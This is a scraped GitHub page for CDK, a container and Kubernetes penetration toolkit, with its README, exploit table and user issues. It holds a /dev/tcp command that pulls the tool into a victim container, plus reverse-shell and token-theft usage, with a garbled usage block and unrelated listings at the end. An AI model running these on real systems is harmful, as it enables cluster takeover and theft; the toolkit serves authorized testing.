CDK - Zero Dependency Container Penetration Toolkit

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

png

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

(get|post) Make request to K8s api-server. ucurl (get|post) Make request to docker unix socket. probe TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000 Options: -h --help Show this help msg. -v --version Show version. ">
Usage:
  cdk evaluate [--full]
  cdk run (--list | 
            
              [
             
              ...])
  cdk auto-escape 
              
               
  cdk 
               
                 [
                
                 ...] Evaluate: cdk evaluate Gather information to find weakness inside container. cdk evaluate --full Enable file scan during information gathering. Exploit: cdk run --list List all available exploits. cdk run 
                 
                   [
                  
                   ...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki Auto Escape: cdk auto-escape 
                   
                     Escape container in different ways then let target execute 
                    
                     . Tool: vi 
                     
                       Edit files in container like "vi" command. ps Show process information like "ps -ef" command. nc [options] Create TCP tunnel. ifconfig Show network information. kcurl 
                      
                        (get|post) 
                        
                         Make request to K8s api-server. ucurl (get|post) 
                          
                           
                            Make request to docker unix socket. probe 
                             
                              
                               
                               
                                 TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000 Options: -h --help Show this help msg. -v --version Show version. 
                               
                              
                             
                            
                          
                         
                       
                      
                     
                    
                   
                  
                 
                
               
              
             
            

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistance and lateral movement
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command will run the scripts below without local file scanning, using --full to enable all.

Tactics Script Supported Usage/Example
Information Gathering OS Basic Info link
Information Gathering Available Capabilities link
Information Gathering Available Linux Commands link
Information Gathering Mounts link
Information Gathering Net Namespace link
Information Gathering Sensitive ENV link
Information Gathering Sensitive Process link
Information Gathering Sensitive Local Files link
Information Gathering Kube-proxy Route Localnet(CVE-2020-8558) link
Discovery K8s Api-server Info link
Discovery K8s Service-account Info link
Discovery Cloud Provider Metadata API link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run 
   
     [options]

   
Tactic Technique CDK Exploit Name Supported In Thin Doc
Escaping docker-runc CVE-2019-5736 runc-pwn
Escaping containerd-shim CVE-2020-15257 shim-pwn link
Escaping docker.sock PoC (DIND attack) docker-sock-check link
Escaping docker.sock RCE docker-sock-pwn link
Escaping Docker API(2375) RCE docker-api-pwn link
Escaping Device Mount Escaping mount-disk link
Escaping LXCFS Escaping lxcfs-rw link
Escaping Cgroups Escaping mount-cgroup link
Escaping Procfs Escaping mount-procfs link
Escaping Ptrace Escaping PoC check-ptrace link
Escaping Rewrite Cgroup(devices.allow) rewrite-cgroup-devices link
Escaping Read arbitrary file from host system (CAP_DAC_READ_SEARCH) cap-dac-read-search link
Discovery K8s Component Probe service-probe link
Discovery Dump Istio Sidecar Meta istio-check link
Discovery Dump K8s Pod Security Policies k8s-psp-dump link
Remote Control Reverse Shell reverse-shell link
Credential Access Registry BruteForce registry-brute link
Credential Access Access Key Scanning ak-leakage link
Credential Access Dump K8s Secrets k8s-secret-dump link
Credential Access Dump K8s Config k8s-configmap-dump link
Privilege Escalation K8s RBAC Bypass k8s-get-sa-token link
Persistence Deploy WebShell webshell-deploy link
Persistence Deploy Backdoor Pod k8s-backdoor-daemonset link
Persistence Deploy Shadow K8s api-server k8s-shadow-apiserver link
Persistence K8s MITM Attack (CVE-2020-8554) k8s-mitm-clusterip link
Persistence Deploy K8s CronJob k8s-cronjob link

Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.

Tool Module

Running commands like in Linux, little different in input-args, see the usage link.

cdk nc [options]
cdk ps
Command Description Supported Usage/Example
nc TCP Tunnel link
ps Process Information link
ifconfig Network Information link
vi Edit Files link
kcurl Request to K8s api-server link
dcurl Request to Docker HTTP API link
ucurl Request to Docker Unix Socket link
rcurl Request to Docker Registry API
probe IP/Port Scanning link

Release Document

If you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the Release Document.

Developer Docs

Contributing to CDK

First off, thanks for taking the time to contribute!

By reporting any issue, ideas or PRs, your GitHub ID will be listed here.

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
  • Running screenshots or logs before and after you fix the problem.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please enable a sustainable environment for us to review contributions.
  • Screenshots about how this new feature works.
  • If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an example.

Events

404StarLink 2.0 - Galaxy

png

Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

BlackHat Asia 2021 Arsenal

HITB SecConf 2021 Amsterdam

WHC 2021 (补天白帽大会)

KCON 2021 Arsenal

Kubernetes community Days 2021

Comments
  • feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492

    feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492

    co-operate with PR #40.

    Use reexec technique to let a multi-thread program (such as this golang program) runs in a different new namespace.

    Why reexec?

    unshare() is not possible to use safely in multi-thread program, especially current circumstance. Check comments in code for more details.

    Signed-off-by: kmahyyg [email protected]

  • Add CAP_DAC_READ_SEARCH escape

    Add CAP_DAC_READ_SEARCH escape

    Hi team! First of all thanks for the project! I'd like to contribute escape via CAP_DAC_READ_SEARCH capability that allows arbitrary file read.

    You'll find documentation to this escape in comments to this PR because I can't edit project Wiki directly.


    Nikita Stupin Advanced Software Technology Lab Huawei

  • expoilt模块下的docker_runc.go的两个问题

    expoilt模块下的docker_runc.go的两个问题

    1. ./cdk run runc-pwn "" 命令执行后,在进程中匹配runc会匹配到运行该条命令的进程。所以总会先匹配到self进程,建议把命令改一下,比如 ./cdk run rc-pwn image

    image

    1. 读取了/proc下的pids后,下图中只把pids遍历一遍就退出了,应该持续监听,直到宿主机再次运行docker exec就可以找到runc了。 image 建议在外面再加一个for循环
  • 在复现CVE-2020-14257遇到问题

    在复现CVE-2020-14257遇到问题

    在复现CVE-2020-15257时遇到问题

    我现在想要复现CDK利用漏洞CVE-2020-15257,我的docker版本是

    $docker version
    Client:
     Version:      18.03.1-ce
     API version:  1.37
     Go version:   go1.9.5
     Git commit:   9ee9f40
     Built:        Thu Apr 26 07:17:20 2018
     OS/Arch:      linux/amd64
     Experimental: false
     Orchestrator: swarm
    
    Server:
     Engine:
      Version:      18.03.1-ce
      API version:  1.37 (minimum version 1.12)
      Go version:   go1.9.5
      Git commit:   9ee9f40
      Built:        Thu Apr 26 07:15:30 2018
      OS/Arch:      linux/amd64
      Experimental: false
    

    API版本是1.3.7,是存在漏洞的版本。

    执行以下命令:

    docker run -itd --name 14257 --net=host ubuntu /bin/bash
    docker cp cdk_linux_amd64 15257:/tmp
    

    然后在容器中:

    ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    

    现在想向我的攻击机上反弹一个宿主机的shell,但是程序报错,具体信息如下:

    root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
    2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
    2021/06/25 03:01:57 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/25 03:01:57 exploit failed.
    

    看起来像是在$PATH目录下没有找到runc,docker我是通过官网提供的方式安装的,没有额外安装过runc,没有切换过容器的底层运行时。容器能够正常运行说明runc肯定是在系统上的,但是利用失败了。

    附加信息

    1、 cdk evaluate --full 的返回结果是?【在host内执行】

    $ ./cdk_linux_amd64 evaluate --full
    
    [Information Gathering - System Info]
    2021/06/24 19:45:23 current dir: /home/xsw/Desktop
    2021/06/24 19:45:23 current user: xsw uid: 1000 gid: 1000 home: /home/xsw
    2021/06/24 19:45:23 hostname: ubuntu
    2021/06/24 19:45:23 debian ubuntu 16.04 kernel: 4.8.0-34-generic
    
    [Information Gathering - Services]
    2021/06/24 19:45:23 sensitive env found:
    	SSH_AUTH_SOCK=/run/user/1000/keyring/ssh
    2021/06/24 19:45:23 service found in process:
    	1873	1814	ibus-engine-sim
    2021/06/24 19:45:23 service found in process:
    	8638	1	dockerd
    2021/06/24 19:45:23 service found in process:
    	8644	8638	docker-containe
    2021/06/24 19:45:23 service found in process:
    	9976	8644	docker-containe
    2021/06/24 19:45:23 service found in process:
    	10501	10470	docker
    2021/06/24 19:45:23 service found in process:
    	12100	11244	docker
    2021/06/24 19:45:23 service found in process:
    	12106	8644	docker-containe
    
    [Information Gathering - Commands and Capabilities]
    2021/06/24 19:45:23 available commands:
    	curl,wget,nc,netcat,docker,find,ps,python,python3,apt,dpkg,ssh,git,vi,capsh,mount,fdisk,gcc,g++,make,base64,python2,python2.7,perl,xterm,sudo
    2021/06/24 19:45:23 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
    	CapInh:	0000000000000000
    	CapPrm:	0000000000000000
    	CapEff:	0000000000000000
    	CapBnd:	0000003fffffffff
    	CapAmb:	0000000000000000
    	Cap decode: 0x0000000000000000 = 
    [*] Maybe you can exploit the Capabilities below:
    
    [Information Gathering - Mounts]
    Device:/dev/sda1 Path:/ Filesystem:ext4 Flags:rw,relatime,errors=remount-ro,data=ordered
    
    [Information Gathering - Net Namespace]
    	host unix-socket found, seems container started with --net=host privilege.
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    
    [Information Gathering - Sysctl Variables]
    2021/06/24 19:45:23 net.ipv4.conf.all.route_localnet = 0
    
    [Discovery - K8s API Server]
    2021/06/24 19:45:23 checking if api-server allows system:anonymous request.
    err found while searching local K8s apiserver addr.:
    err: cannot find kubernetes api host in ENV
    	api-server forbids anonymous request.
    	response:
    
    [Discovery - K8s Service Account]
    load K8s service account token error.:
    open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
    
    [Discovery - Cloud Provider Metadata API]
    2021/06/24 19:45:24 failed to dial Alibaba Cloud API.
    2021/06/24 19:45:25 failed to dial Azure API.
    2021/06/24 19:45:25 failed to dial Google Cloud API.
    2021/06/24 19:45:26 failed to dial Tencent Cloud API.
    2021/06/24 19:45:27 failed to dial OpenStack API.
    2021/06/24 19:45:27 failed to dial Amazon Web Services (AWS) API.
    2021/06/24 19:45:28 failed to dial ucloud API.
    
    [Information Gathering - Sensitive Files]
    	/.bashrc - /etc/skel/.bashrc
    	/docker.sock - /etc/systemd/system/sockets.target.wants/docker.socket
    	/.bash_history - /home/xsw/.bash_history
    	/.bashrc - /home/xsw/.bashrc
    	.git/ - /home/xsw/metarget/.git/HEAD
    	.git/ - /home/xsw/metarget/.git/branches
    	.git/ - /home/xsw/metarget/.git/config
    	.git/ - /home/xsw/metarget/.git/description
    	.git/ - /home/xsw/metarget/.git/hooks
    	.git/ - /home/xsw/metarget/.git/index
    	.git/ - /home/xsw/metarget/.git/info
    	.git/ - /home/xsw/metarget/.git/logs
    	.git/ - /home/xsw/metarget/.git/objects
    	.git/ - /home/xsw/metarget/.git/packed-refs
    	.git/ - /home/xsw/metarget/.git/refs
    	/docker.sock - /lib/systemd/system/docker.socket
    	/docker.sock - /run/docker.sock
    	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/docker.socket.dsh-also
    	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
    
    [Information Gathering - ASLR]
    2021/06/24 19:45:49 /proc/sys/kernel/randomize_va_space file content: 2
    2021/06/24 19:45:49 ASLR is enabled.
    
    [Information Gathering - Cgroups]
    2021/06/24 19:45:49 /proc/1/cgroup file content:
    	11:pids:/init.scope
    	10:cpuset:/
    	9:hugetlb:/
    	8:memory:/init.scope
    	7:devices:/init.scope
    	6:freezer:/
    	5:cpu,cpuacct:/init.scope
    	4:perf_event:/
    	3:net_cls,net_prio:/
    	2:blkio:/init.scope
    	1:name=systemd:/init.scope
    

    2、完整错误信息

    root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
    2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
    2021/06/25 03:01:57 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/25 03:01:57 exploit failed.
    
  • add kubelet exec

    add kubelet exec

    Exploit: kubelet-exec

    Use the default '10250' port 'kubelet' service to list pods running in the cluster.
    By default, unauthorized access is supported. The token can be entered optionally.

    利用默认10250端口kubelet服务列举集群中运行的pods,支持指定pods执行系统命令并回显。
    默认支持未授权访问利用,token可选择性填写。

    Usage

    ./cdk run kubelet-exec (list|exec) <endpoint>/<namespace>/<pod>/<container> <token>
    

    Example

    ./cdk run kubelet-exec list http://172.16.61.10:10250
    ./cdk run kubelet-exec exec https://172.16.61.10:10250/kube-system/test1/test "ip addr"
    
  • Implement mount-cgroup in Golang style

    Implement mount-cgroup in Golang style

    feat(exp/mount_cgroup.go): completely fix #35 in golang-style

    This implemented mount-cgroup exploit totally in Golang.

    Detailed information:

    • Change whole "create-mount-write" process using Golang native Unix API.
    • To avoid conflict, increase length of random string from 3 to 4. Tasks sub-cgroup are also in the same kind of random name.
    • Read mounted filesystem information from /proc/self/mountinfo, instead of /etc/mtab .
    • Due to the limitation of exec.Command, output redirect is implemented in another way: manually get pid and write to cgroups.procs

    Further enhancement:

    • To read the container filesystem path on the host, implement to read superBlockOptions of MountInfo.
    • To implement CVE-2022-0492 in this PR further, I modified EscapeCgroup function, so that it can be re-used for other subsystems.

    Chores:

    • go mod tidy
    • Fix Typo
    • Run a much quicker random string generator
    1b94046 (HEAD -> main, origin/main, origin/HEAD) feat(exp/mount_cgroup.go): completely fix #35 in golang-style
    043d6b6 feat(util/cgroup.go): add superBlockOptions when parsing /proc/self/mountinfo
    4c640ae fix(util/cgroup.go): typo: marjor -> major
    60b44e5 fix(exp/mount-cgroup): fix #35 in shell-style in a simple way
    ecfadba optimize(exp/mount-cgroup): update build constraint, cgroup is linux only
    ef056df optimize(util/common.go): Quicker Random String Generator
    
  • Add check for `CAP_SYS_MODULE` and `CAP_DAC_READ_SEARCH`

    Add check for `CAP_SYS_MODULE` and `CAP_DAC_READ_SEARCH`

    Hi team,

    1. In this PR I've added explicit check for CAP_SYS_MODULE (and CAP_DAC_READ_SERACH as well) at evaluate step. This way it's more clear for end-user what escape techniques he / she can apply after evaluate step is completed.
    2. I suggest to refactor check_ptrace.go in similar way because technically it's just evaluating that CAP_SYS_PTRACE exists and not actually escaping. So I suppose it should belong to evaluate step rather than escape step.
    3. The reason why I didn't implement actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it. Given how many kernel versions and architectures out there I see several options:
      1. To make detailed instructions on how to build kernel module for arbitrary kernel version and architecture and put them to CDK.
      2. To prebuilt kernel module for most popular distributions (e.g. Ubuntu 20.04) include them in CDK binary and leave note on how to build kernel module for other kernel versions.
    4. What do you think about point (3)? Do you have any ideas on how to integrate CAP_SYS_MODULE escape to CDK?

    Nikita Stupin Advanced Software Technology Lab Huawei

  • add lxcfs-rw escape

    add lxcfs-rw escape

    添加当容器内 lxcfs 可写当情况下的利用 image

    output:

    /tmp # ./cdk run lxcfs-rw
    2021/01/27 16:30:17 found pod devices.allow path: /kubepods/burstable/pod3453dde3-3ede-11eb-bff3-5254005e6516/8ca73287248fc9f72f6d502db9406edeca5acacd85b466b68d7ad4810e3bf7e5
    2021/01/27 16:30:17 found rw lxcfs mountpoint: /data/monitor/lxcfs
    2021/01/27 16:30:17 found host blockDeviceId Marjor: 253 Minor: 1
    2021/01/27 16:30:17 set all block device accessible success.
    2021/01/27 16:30:17 devices.allow content: a *:* rwm
    2021/01/27 16:30:17 exploit success, run "debugfs -w host_dev".
    

    利用效果: image

  • shim-pwn执行失败

    shim-pwn执行失败

    尝试了一下shim-pwn,在容器里执行shim-pwd的exp,报了下面的错误:

    debianxxx(@:):~# ./cdk_linux_amd64 run shim-pwn 10.1.1.1 12346
    2020/12/30 17:36:09 tring to spawn shell to 10.1.1.1:12346
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/fc3385bd1b56983d7a5fc2997560cc445180cd1130150692171563eed09d8c3d/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/b029461e5e5f7dbca3b6fd89414ac06946d5fb73456000edcc2f9fcc6ef9164c/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/7a77f96e2061f6d5160167400ae59b20d08229a626ff1ef5bdd9e7458e95741f/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    

    docker版本:

    Client:
     Version:           18.06.1-ce
     API version:       1.38
     Go version:        go1.10.3
     Git commit:        e68fc7a
     Built:             Tue Aug 21 17:23:18 2018
     OS/Arch:           linux/amd64
     Experimental:      false
    
    Server:
     Engine:
      Version:          18.06.1-ce
      API version:      1.38 (minimum version 1.12)
      Go version:       go1.10.3
      Git commit:       e68fc7a
      Built:            Tue Aug 21 17:22:21 2018
      OS/Arch:          linux/amd64
      Experimental:     false
    
  • k8s-shadow-apiserver 返回包判断有问题

    k8s-shadow-apiserver 返回包判断有问题

    请详细描述你遇到的问题 (Please describe the issue in detail)

    使用cdk部署影子api server时,代码端判断selfLink,但是podlist里面没有该字段 k8s版本1.20.6

    Note: 提交issue前,请检查你所使用的CDK是否是最新版,有些BUG我们新版本已经修复啦。
    Before submitting an issue, please check whether the CDK you are using is the latest version, otherwise there may be some bugs that have been fixed in latest version.

    2、请贴出完整错误信息,可以是命令行输出、软件报错信息、截图等。(Please post the full error message, which can be command line output, software error message, screenshots, etc.)

    ./cdk run k8s-shadow-apiserver default
    

    image image 注意,请贴出完整错误信息,不要只粘贴错误的最后一行!Attention, please post the full error message, don't paste the last line of the error only!

  • add etcd get k8s token

    add etcd get k8s token

    Exploit: etcd-get-k8s-token

    List key and value pairs under the /registry/secrets/kube-system/ in etcd service, regular extract plaintext service-account-token, requests the default port 6443 'K8s API-server' service to verify the validity of the token and take over the cluster.

    遍历etcd/registry/secrets/kube-system/前缀下的key、value对,正则提取明文service-account-token,对默认6443端口K8s api-server服务进行请求,验证token有效性,可进一步接管集群。

    Usage

    ./cdk run etcd-get-k8s-token (anonymous|default) <endpoint> <cert> <cert_key> <ca>
    

    Example

    ./cdk run etcd-get-k8s-token anonymous http://172.16.61.10:2379
    ./cdk run etcd-get-k8s-token default
    
  • [Exploit] Implement actual CAP_SYS_MODULE escape in CDK

    [Exploit] Implement actual CAP_SYS_MODULE escape in CDK

    From: @nikitastupin in #20

    The reason why I didn't implement actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it. Given how many kernel versions and architectures out there I see several options:

    • To make detailed instructions on how to build kernel module for arbitrary kernel version and architecture and put them to CDK.
    • To prebuilt kernel module for most popular distributions (e.g. Ubuntu 20.04) include them in CDK binary and leave note on how to build kernel module for other kernel versions.

    Great thanks to Nikita.

  • [doc] document about thin version and upx version

    [doc] document about thin version and upx version

    需要一个解释说明各 release binary 区别的文档(备忘,近期编写)。

    In the current major release we added a lightweight version, it’s prepared for short-life container shells such as Serverless functions. We add build tags in source code and cut a few exploits to make the binary lighter, just a 2MB file, but contains 90% of CDK functions, you may also pick up useful exploits in our CDK source code to build your own lightweight binary.

    image

A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment 中文文档 Pre-Built Release https://github.com/ctrsploit/ctrsploit/releases Usage Quick-Start wg

Dec 6, 2022
Tpf2-tpnetmap-toolkit - A toolkit to create svg map images from TransportFever2 world data
Tpf2-tpnetmap-toolkit - A toolkit to create svg map images from TransportFever2 world data

tpf2-tpnetmap-toolkit TransportFever2 のワールドデータから svg のマップ画像を作成するツールキットです。 1. 導入方

Feb 17, 2022
Tool which gathers basic info from apk, which can be used for Android penetration testing.
Tool which gathers basic info from apk, which can be used for Android penetration testing.

APKSEC Tool which gathers basic info from apk, which can be used for Android penetration testing. REQUIREMENTS AND INSTALLATION Build APKSEC: git clon

Sep 2, 2022
Moby Project - a collaborative project for the container ecosystem to assemble container-based systems
Moby Project - a collaborative project for the container ecosystem to assemble container-based systems

The Moby Project Moby is an open-source project created by Docker to enable and accelerate software containerization. It provides a "Lego set" of tool

Jan 8, 2023
Boxygen is a container as code framework that allows you to build container images from code

Boxygen is a container as code framework that allows you to build container images from code, allowing integration of container image builds into other tooling such as servers or CLI tooling.

Dec 13, 2021
Amazon ECS Container Agent: a component of Amazon Elastic Container Service
Amazon ECS Container Agent: a component of Amazon Elastic Container Service

Amazon ECS Container Agent The Amazon ECS Container Agent is a component of Amazon Elastic Container Service (Amazon ECS) and is responsible for manag

Dec 28, 2021
The Container Storage Interface (CSI) Driver for Fortress Block Storage This driver allows you to use Fortress Block Storage with your container orchestrator

fortress-csi The Container Storage Interface (CSI) Driver for Fortress Block Storage This driver allows you to use Fortress Block Storage with your co

Jan 23, 2022
Grafana Tempo is a high volume, minimal dependency distributed tracing backend.
Grafana Tempo is a high volume, minimal dependency distributed tracing backend.

Grafana Tempo is an open source, easy-to-use and high-scale distributed tracing backend. Tempo is cost-efficient, requiring only object storage to ope

Jan 8, 2023
Dependency management solution for Hashicorp Terraform modules

TERRADEP This is the module dependency solution for implementing terraform's modules dependency. Using this, users can now manage dependencies both fr

Dec 21, 2021
Show dependency graph of docker images/containers
Show dependency graph of docker images/containers

docker-graph Show dependency graph of docker images/containers like this: Orange is images and green is containers. Features Collect docker images, co

Feb 7, 2022
Feb 12, 2022
concurrent, cache-efficient, and Dockerfile-agnostic builder toolkit
concurrent, cache-efficient, and Dockerfile-agnostic builder toolkit

BuildKit BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Key features: Automati

Dec 31, 2022
IndieAuth Toolkit for Go.

IndieAuth Toolkit for Go This repository contains a set of tools to help you implement IndieAuth, both server and client, in Go. The documentation can

Nov 26, 2022
JOY5 AV Toolkit.

JOY5 AV Toolkit.

Dec 30, 2022
BuildKit - A toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner
BuildKit - A toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner

BuildKit BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Key features: Automati

Feb 19, 2022
Harbormaster - Toolkit for automating the creation & mgmt of Docker components and tools

My development environment is MacOS with an M1 chip and I mostly develop for lin

Feb 17, 2022
APKrash is an Android APK security analysis toolkit focused on comparing APKs to detect tampering and repackaging.
 APKrash is an Android APK security analysis toolkit focused on comparing APKs to detect tampering and repackaging.

APKrash APKrash is an Android APK security analysis toolkit focused on comparing APKs to detect tampering and repackaging. Features Able to analyze pu

Nov 8, 2022
Substation is a cloud native toolkit for building modular ingest, transform, and load (ITL) data pipelines

Substation Substation is a cloud native data pipeline toolkit. What is Substation? Substation is a modular ingest, transform, load (ITL) application f

Dec 30, 2022